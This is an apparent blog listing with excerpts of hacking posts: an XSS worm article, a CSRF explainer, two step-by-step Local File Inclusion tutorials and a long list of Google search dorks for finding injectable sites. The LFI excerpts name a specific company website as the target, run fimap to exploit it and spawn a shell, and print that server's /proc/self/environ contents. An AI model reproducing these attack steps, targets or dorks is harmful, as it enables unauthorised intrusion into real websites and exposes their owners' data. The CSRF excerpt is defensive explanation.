Cyber Security India

PHP XSS Worm If you find the formatting of this article to be off, please wget picobsd.amdwebhost.com/~cfc/xss.txt Before anyone flames me, the code in this article is purposefully flawed. It will not work. A programmer should be able to get it to work in a matter of minutes. I removed some code and modified other stuff so that skiddies don't pick it up. This article is meant for understanding, not as a contribution of code. A while back, I was poking around a web 2.0 site. I noticed something rather interesting: every single prefernce for users had it's own file. This was probably done because the site, which was AJAX based, modified user information via AJAX, and therefore often times there was only one value being edited at a time. I started poking around these, and I found out early on that all data sanitation was done with Javascript. I'm assuming this is because the developer was more comfortable with javascript, and didn't use PHP for anyt...

Understanding CSRF The Express team's  csrf  and  csurf  modules frequently have issues popping up concerned about our usage of cryptographic functions. These concerns are unwarranted due to a misunderstanding of how CSRF tokens work. So here's a quick run down! Read this and still have questions? Want to tell us we're wrong? Open an issue! How does a CSRF attack work? On their own (phishing site), an attacker could create an AJAX button or form that creates a request against your site: < form action = " https://my.site.com/me/something-destructive " method = " POST " > < button type = " submit " >Click here for free money!</ button > </ form > This is worse with AJAX as the attacker could use other methods like  DELETE  as well as read the result. This is particularly important when the user has some sort of session with very personal details on your site. If this is in the context of a techno...

step by step LFI: step 1:              the vulnurable link is              http://www.egenerationglobal.com/index.php?page=offshore_software_development.php         step 2:              scan it with fimap                 disktop/fi>fimap.py -u "http://www.egenerationglobal.com/index.php?page=offshore_software_development.php" step 3:     exploit with fimap     disktop/fi>fimap.py -x "http://www.egenerationglobal.com/index.php?page=offshore_software_development.php"   step 4:     now it will ask to choose a domain we wanna exploit juz choose a number step 5:     it will ask for the two available attack so we need to choose any one     Spawn Shell                       ...

LOCAL FILE INCLUSION: Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected show you how to get a shell on websites using Local File Inclusion vulnerabilities and injection malicious code in proc/self/environ.Is a step by step tutorial.            First lets take a look at a php code that is vulnerable to LFI: $page = $_GET[page]; include($page); ?> Now, this is a piece of code that should NEVER be used, because the $page isn’t sanitized and is passed directly to the webpage, but unfortunately (or not ) is very common to  find in the ‘www’ step 2: Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it. eg.. www.website.com/view.php?page=contact.php - Now lets replace contact.php...

Step1) Find a LFI Vulnerable site       example : http://somesite.com/something.php?something=something.something Step 2) To find if the given site is vulnerable for LFI we shall insert the following /etc/passwd and find out the result of the site Example : http://egenerationglobal.com/index.php?page=/etc/passwd Now we are sure that this site is vulnerable for LFI (LOCAL FILE INCLUSION) Step 3 ) http://egenerationglobal.com/index.php?page=/proc/self/environ DOCUMENT_ROOT=/home/egenerat/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,application/xhtmlxml,application/xml; q=0.9,*/*; q=0.8 HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-;q=0.7,*;q=0.7 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5 HTTP_CONNECTION=keep-alive HTTP_HOST=egenerationglobal.com HTTP_KEEP_ALIVE=115 HTTP_USER_AGENT=Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 PATH=/bin:/usr/bin QUERY_STRING=page=/proc/self/environ RED...

inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategor...